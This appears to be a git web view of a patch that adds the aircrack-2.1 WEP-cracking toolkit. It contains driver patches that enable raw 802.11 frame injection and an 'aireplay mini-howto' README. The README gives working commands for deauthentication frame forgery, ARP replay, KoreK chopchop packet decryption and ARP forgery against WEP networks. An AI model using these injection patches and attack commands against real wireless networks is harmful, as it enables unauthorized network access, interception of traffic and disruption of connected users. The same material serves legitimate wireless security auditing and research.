2267+- // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2268+- usbpktlen+=8;
2269+- } else {
2270+- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
2271++ hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
2272++ hw->txbuff.txfrm.desc.tx_control =
2273++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
2274++
2275++ /* copy the header over to the txdesc */
2276++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
2277++ sizeof(p80211_hdr_t));
2278+ }
2279+
2280+ usbpktlen += skb->len;
2281+
2282+ /* copy over the WEP IV if we are using host WEP */
2283+ ptr = hw->txbuff.txfrm.data;
2284+- if (p80211_wep->data) {
2285++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
2286+ memcpy(ptr, p80211_wep->iv, sizeof(p80211_wep->iv));
2287+ ptr+= sizeof(p80211_wep->iv);
2288+ memcpy(ptr, p80211_wep->data, skb->len);
2289+ } else {
2290+ memcpy(ptr, skb->data, skb->len);
2291+ }
2292++
2293+ /* copy over the packet data */
2294+ ptr+= skb->len;
2295+
2296+ /* copy over the WEP ICV if we are using host WEP */
2297+- if (p80211_wep->data) {
2298++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
2299+ memcpy(ptr, p80211_wep->icv, sizeof(p80211_wep->icv));
2300+ }
2301+
2302+@@ -4105,6 +4133,17 @@
2303+ switch( HFA384x_RXSTATUS_MACPORT_GET(usbin->rxfrm.desc.status))
2304+ {
2305+ case 0:
2306++ /* KoreK: this testmode uses macport 0 */
2307++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
2308++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
2309++ if ( ! HFA384x_RXSTATUS_ISFCSERR(usbin->rxfrm.desc.status) ) {
2310++ hfa384x_int_rxmonitor(wlandev, &usbin->rxfrm);
2311++ } else {
2312++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
2313++ }
2314++ goto done;
2315++ }
2316++
2317+ w_hdr = (p80211_hdr_t *) &(usbin->rxfrm.desc.frame_control);
2318+ fc = ieee2host16(usbin->rxfrm.desc.frame_control);
2319+
2320+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c
2321+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c 2005-01-25 01:38:50.000000000 +0100
2322++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c 2005-03-14 13:58:11.000000000 +0100
2323+@@ -2855,9 +2855,10 @@
2324+ }
2325+
2326+ /* Now if we're already sniffing, we can skip the rest */
2327+- if (wlandev->netdev->type != ARPHRD_ETHER) {
2328++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
2329++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
2330+ /* Set the port type to pIbss */
2331+- word = HFA384x_PORTTYPE_PSUEDOIBSS;
2332++ word = 5; // HFA384x_PORTTYPE_PSUEDOIBSS;
2333+ result = hfa384x_drvr_setconfig16(hw,
2334+ HFA384x_RID_CNFPORTTYPE, word);
2335+ if ( result ) {
2336+@@ -2869,6 +2870,8 @@
2337+ }
2338+ if ((msg->keepwepflags.status == P80211ENUM_msgitem_status_data_ok) && (msg->keepwepflags.data != P80211ENUM_truth_true)) {
2339+ /* Set the wepflags for no decryption */
2340++ /* doesn't work - done from the CLI */
2341++ /* Fix? KoreK */
2342+ word = HFA384x_WEPFLAGS_DISABLE_TXCRYPT |
2343+ HFA384x_WEPFLAGS_DISABLE_RXCRYPT;
2344+ result = hfa384x_drvr_setconfig16(hw, HFA384x_RID_CNFWEPFLAGS, word);
2345+@@ -2914,7 +2917,8 @@
2346+ goto failed;
2347+ }
2348+
2349+- if (wlandev->netdev->type == ARPHRD_ETHER) {
2350++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
2351++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
2352+ WLAN_LOG_INFO("monitor mode enabled\n");
2353+ }
2354+
2355+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c
2356+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c 2005-01-25 01:38:50.000000000 +0100
2357++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c 2005-03-14 13:58:11.000000000 +0100
2358+@@ -649,7 +649,8 @@
2359+ DBFENTER;
2360+
2361+ /* If necessary, set the 802.11 WEP bit */
2362+- if ((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED) {
2363++ if (((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED)
2364++ && (skb->protocol != htons(ETH_P_80211_RAW))) {
2365+ p80211_hdr->a3.fc |= host2ieee16(WLAN_SET_FC_ISWEP(1));
2366+ }
2367+
2368diff -urN aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 aircrack-2.1/patch/madwifi-20050309.patch.0.1
2369--- aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2370+++ aircrack-2.1/patch/madwifi-20050309.patch.0.1 2005-04-22 08:51:21.936064512 +0200
2371@@ -0,0 +1,123 @@
2372+diff -ur madwifi/ath/if_ath.c madwifi-foo/ath/if_ath.c
2373+--- madwifi/ath/if_ath.c 2005-03-09 14:48:52.000000000 -0500
2374++++ madwifi-foo/ath/if_ath.c 2005-03-09 22:02:12.000000000 -0500
2375+@@ -1113,7 +1113,8 @@
2376+ /*
2377+ * Encapsulate the packet for transmission.
2378+ */
2379+- skb = ieee80211_encap(ic, skb, &ni);
2380++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
2381++ skb = ieee80211_encap(ic, skb, &ni);
2382+ if (skb == NULL) {
2383+ DPRINTF(sc, ATH_DEBUG_XMIT,
2384+ "%s: discard, encapsulation failure\n", __func__);
2385+@@ -2843,7 +2844,7 @@
2386+ hdrlen = ieee80211_anyhdrsize(wh);
2387+ pktlen = skb->len;
2388+
2389+- if (iswep) {
2390++ if (iswep && ic->ic_opmode != IEEE80211_M_MONITOR) {
2391+ const struct ieee80211_cipher *cip;
2392+ struct ieee80211_key *k;
2393+
2394+@@ -2905,7 +2906,7 @@
2395+ * use short preamble based on the current mode and
2396+ * negotiated parameters.
2397+ */
2398+- if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) &&
2399++ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && ni != NULL &&
2400+ (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) {
2401+ shortPreamble = AH_TRUE;
2402+ sc->sc_stats.ast_tx_shortpre++;
2403+@@ -2920,6 +2921,11 @@
2404+ */
2405+ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) {
2406+ case IEEE80211_FC0_TYPE_MGT:
2407++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2408++ atype = HAL_PKT_TYPE_NORMAL; /* default */
2409++ txq = sc->sc_ac2q[skb->priority];
2410++ break;
2411++ }
2412+ subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
2413+ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON)
2414+ atype = HAL_PKT_TYPE_BEACON;
2415+@@ -2939,6 +2945,11 @@
2416+ txq = sc->sc_ac2q[WME_AC_VO];
2417+ break;
2418+ case IEEE80211_FC0_TYPE_CTL:
2419++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2420++ atype = HAL_PKT_TYPE_NORMAL; /* default */
2421++ txq = sc->sc_ac2q[skb->priority];
2422++ break;
2423++ }
2424+ atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */
2425+ rix = 0; /* XXX lowest rate */
2426+ try0 = ATH_TXMAXTRY;
2427+@@ -2951,11 +2962,14 @@
2428+ break;
2429+ case IEEE80211_FC0_TYPE_DATA:
2430+ atype = HAL_PKT_TYPE_NORMAL; /* default */
2431++ rix = 0; /* XXX lowest rate */
2432++ try0 = ATH_TXMAXTRY;
2433+ /*
2434+ * Data frames; consult the rate control module.
2435+ */
2436+- ath_rate_findrate(sc, an, shortPreamble, skb->len,
2437+- &rix, &try0, &txrate);
2438++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
2439++ ath_rate_findrate(sc, an, shortPreamble, skb->len,
2440++ &rix, &try0, &txrate);
2441+ /*
2442+ * Default all non-QoS traffic to the background queue.
2443+ */
2444+@@ -2966,6 +2980,11 @@
2445+ txq = sc->sc_ac2q[WME_AC_BK];
2446+ break;
2447+ default:
2448++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2449++ atype = HAL_PKT_TYPE_NORMAL; /* default */
2450++ txq = sc->sc_ac2q[skb->priority];
2451++ break;
2452++ }
2453+ printk("%s: bogus frame type 0x%x (%s)\n", dev->name,
2454+ wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__);
2455+ /* XXX statistic */
2456+@@ -3068,6 +3087,12 @@
2457+ ieee80211_dump_pkt(skb->data, skb->len,
2458+ sc->sc_hwmap[txrate], -1);
2459+
2460++ /* Let those crazy kids transmit frames in monitor mode */
2461++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2462++ /* Only transmit one frame, disable retrans */
2463++ try0 = 1;
2464++ }
2465++
2466+ /*
2467+ * Determine if a tx interrupt should be generated for
2468+ * this descriptor. We take a tx interrupt to reap
2469+@@ -3096,7 +3121,7 @@
2470+ , pktlen /* packet length */
2471+ , hdrlen /* header length */
2472+ , atype /* Atheros packet type */
2473+- , MIN(ni->ni_txpower,60)/* txpower */
2474++ , 60 /* txpower */
2475+ , txrate, try0 /* series 0 rate/tries */
2476+ , keyix /* key cache index */
2477+ , sc->sc_txantenna /* antenna mode */
2478+@@ -3104,6 +3129,7 @@
2479+ , ctsrate /* rts/cts rate */
2480+ , ctsduration /* rts/cts duration */
2481+ );
2482++
2483+ /*
2484+ * Setup the multi-rate retry state only when we're
2485+ * going to use it. This assumes ath_hal_setuptxdesc
2486+@@ -3111,7 +3137,7 @@
2487+ * when the hardware supports multi-rate retry and
2488+ * we don't use it.
2489+ */
2490+- if (try0 != ATH_TXMAXTRY)
2491++ if (try0 != ATH_TXMAXTRY && ic->ic_opmode != IEEE80211_M_MONITOR)
2492+ ath_rate_setupxtxdesc(sc, an, ds, shortPreamble, rix);
2493+
2494+ ds->ds_link = 0;
2495diff -urN aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1
2496--- aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2497+++ aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1 2005-04-22 08:51:21.937064360 +0200
2498@@ -0,0 +1,12 @@
2499+diff -u prism54/islpci_eth.c prism54-diff/islpci_eth.c
2500+--- prism54/islpci_eth.c 2004-12-24 16:33:51.000000000 -0500
2501++++ prism54-diff/islpci_eth.c 2005-03-02 16:44:15.000000000 -0500
2502+@@ -99,7 +99,7 @@
2503+
2504+ /* determine the amount of fragments needed to store the frame */
2505+
2506+- frame_size = skb->len < ETH_ZLEN ? ETH_ZLEN : skb->len;
2507++ frame_size = skb->len;
2508+ if (init_wds)
2509+ frame_size += 6;
2510+
2511diff -urN aircrack-2.1.orig/pcap-aireplay.h aircrack-2.1/pcap-aireplay.h
2512--- aircrack-2.1.orig/pcap-aireplay.h 1970-01-01 01:00:00.000000000 +0100
2513+++ aircrack-2.1/pcap-aireplay.h 2005-04-22 08:51:21.937064360 +0200
2514@@ -0,0 +1,40 @@
2515+#ifndef _COMMON_H
2516+#define _COMMON_H
2517+
2518+#include <sys/time.h>
2519+
2520+#define IVSONLY_MAGIC "\xBF\xCA\x84\xD4"
2521+#define TCPDUMP_MAGIC 0xA1B2C3D4
2522+#define TCPDUMP_CIGAM 0xD4C3B2A1
2523+#define PCAP_VERSION_MAJOR 2
2524+#define PCAP_VERSION_MINOR 4
2525+#define LINKTYPE_ETHERNET 1
2526+#define LINKTYPE_IEEE802_11 105
2527+#define LINKTYPE_PRISM_HEADER 119
2528+
2529+struct pcap_file_header
2530+{
2531+ unsigned int magic;
2532+ unsigned short version_major;
2533+ unsigned short version_minor;
2534+ int thiszone;
2535+ unsigned int sigfigs;
2536+ unsigned int snaplen;
2537+ unsigned int linktype;
2538+};
2539+
2540+struct pcap_pkthdr
2541+{
2542+ int tv_sec;
2543+ int tv_usec;
2544+ unsigned int caplen;
2545+ unsigned int len;
2546+};
2547+
2548+#define SWAP32(x) \
2549+ x = ( ( ( x >> 24 ) & 0x000000FF ) | \
2550+ ( ( x >> 8 ) & 0x0000FF00 ) | \
2551+ ( ( x << 8 ) & 0x00FF0000 ) | \
2552+ ( ( x << 24 ) & 0xFF000000 ) );
2553+
2554+#endif /* common.h */
2555diff -urN aircrack-2.1.orig/README aircrack-2.1/README
2556--- aircrack-2.1.orig/README 1970-01-01 01:00:00.000000000 +0100
2557+++ aircrack-2.1/README 2005-04-22 08:51:21.938064208 +0200
2558@@ -0,0 +1,173 @@
2559+
2560+
2561+
2562+
2563+ aireplay mini-howto
2564+
2565+
2566+
2567+
2568+ Example test setup:
2569+
2570+ * Acess Point (hostap) - 00:02:2D:AA:9C:13 , 10.0.0.1
2571+ * Wireless client (madwifi) - 00:09:5B:FC:21:F4 , 10.0.0.2
2572+ * Laptop with a Prism2 or Atheros of Prism54 card
2573+
2574+
2575+ 0. Changes since last release
2576+ =============================
2577+
2578+ * built-in chopchop operation mode
2579+ * added a bunch of options in aireplay
2580+ * added deauthentication frame forgery
2581+ * Prism2 (wlan-ng) USB device support
2582+ * Atheros (madwifi) and Prism54 device support
2583+
2584+
2585+ 1. Driver recompilation
2586+ =======================
2587+
2588+ 1.1. Installing linux-wlan-ng-0.2.1-pre26
2589+ -----------------------------------------
2590+
2591+First, make sure you have updated your card's station and primary
2592+firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.
2593+
2594+cd /usr/src
2595+wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
2596+tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
2597+cd linux-wlan-ng-0.2.1-pre26
2598+patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
2599+make config
2600+make all
2601+find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
2602+make -C src install
2603+cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
2604+mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
2605+ifconfig wlan0 down
2606+wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
2607+/etc/init.d/pcmcia restart
2608+(reinsert card)
2609+
2610+
2611+ 1.2. Installing madwifi
2612+ -----------------------
2613+
2614+Note: a tarball is also available at http://madwifi.otaku42.de/
2615+
2616+cd /usr/src
2617+cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
2618+cd madwifi
2619+patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
2620+make
2621+make install
2622+modprobe ath_pci
2623+
2624+
2625+ 1.3. Installing prism54
2626+ -----------------------
2627+
2628+Make sure the hotplug package is installed and hotplug firmware
2629+loading support is present in your kernel (module firmware_class).
2630+
2631+cd /usr/src
2632+wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2
2633+tar -xvjf prism54-svn-latest.tar.bz2
2634+cd prism54-svn-latest
2635+make modules
2636+make install
2637+mkdir -p /usr/lib/hotplug/firmware
2638+wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
2639+mv 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
2640+modprobe prism54
2641+
2642+
2643+ 2. Using aireplay
2644+ =================
2645+
2646+ *** aireplay does not capture replies: ***
2647+ *** you must also start airodump (not Kismet!) ***
2648+
2649+ If you use madwifi, you may have to place the card in
2650+ pure 802.11b mode first:
2651+
2652+iwpriv ath0 mode 2
2653+
2654+ If you use wlan-ng, run ./wlanng.sh start wlan0 <channel>
2655+ Otherwise run:
2656+
2657+iwconfig ath0 mode Monitor channel <channel>
2658+ifconfig ath0 up
2659+
2660+
2661+ 2.1. Attack 1: deauthentication
2662+ -------------------------------
2663+
2664+This attack is especially useful to capture an ESSID or a WPA handshake;
2665+it will not generate WEP traffic (or very little).
2666+
2667+./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
2668+./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0
2669+
2670+
2671+ 2.2. Attack 2: classic arp-request resend
2672+ -----------------------------------------
2673+
2674+./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0
2675+
2676+
2677+ 2.3. Attack 3: data broadcast resend
2678+ ------------------------------------
2679+
2680+This attack is quite unreliable and often doesn't work. You need
2681+the MAC address of an authenticated station so that the AP will
2682+not drop the packets. As most APs work in open authentication mode,
2683+if you have another wireless card, you can simply associate it
2684+and use its MAC address.
2685+
2686+./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0
2687+
2688+
2689+ 2.4. Attack 4: arp-request forgery
2690+ ----------------------------------
2691+
2692+First, we need a prga by decrypting a data packet. For this, add the -k
2693+flag which will enable KoreK's chopchop attack:
2694+
2695+./aireplay -k eth1
2696+
2697+This attack may not work in deauthenticated mode (in which the source
2698+MAC address is forged). If this is the case, you will have the pass the
2699+address of an authenticated station:
2700+
2701+./aireplay -h 00:09:5B:FC:21:F4 -k eth1
2702+
2703+If no station is authenticated, and you have a spare wireless card
2704+(say, an orinoco on eth1) you can use it to associate with the AP
2705+as most Access Points run in open authentication mode and do not
2706+actually check the WEP key - then use the MAC adresse of eth1 when
2707+running the chopchop attack. Having an authenticated station is
2708+also useful when there are no connected clients, so that the AP
2709+will send broadcast packets to the air (even though when don't
2710+know the WEP key yet).
2711+
2712+iwconfig eth1 mode Managed essid "whathever" key 1111111111
2713+ifconfig eth1 up
2714+
2715+If the attack suceeded, have a look at the decrypted packet:
2716+
2717+tcpdump -e -n -t -r replay_dec-050320-023844.cap
2718+
2719+BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
2720+SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 10.0.0.2.32774 > 10.0.0.3.22: S
2721+2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>
2722+
2723+Now we have enough information to forge an ARP request:
2724+
2725+./airforge replay_dec-050320-023844.xor 1 00:02:2d:aa:9c:13 \
2726+00:09:5b:fc:21:f4 10.0.0.2 10.0.0.3 arp.cap
2727+
2728+And finally:
2729+
2730+./aireplay -r arp.cap ath0
2731+
Tool that cracks 802.11 WEP encryption keys
This page took 0.691149 seconds and 4 git commands to generate.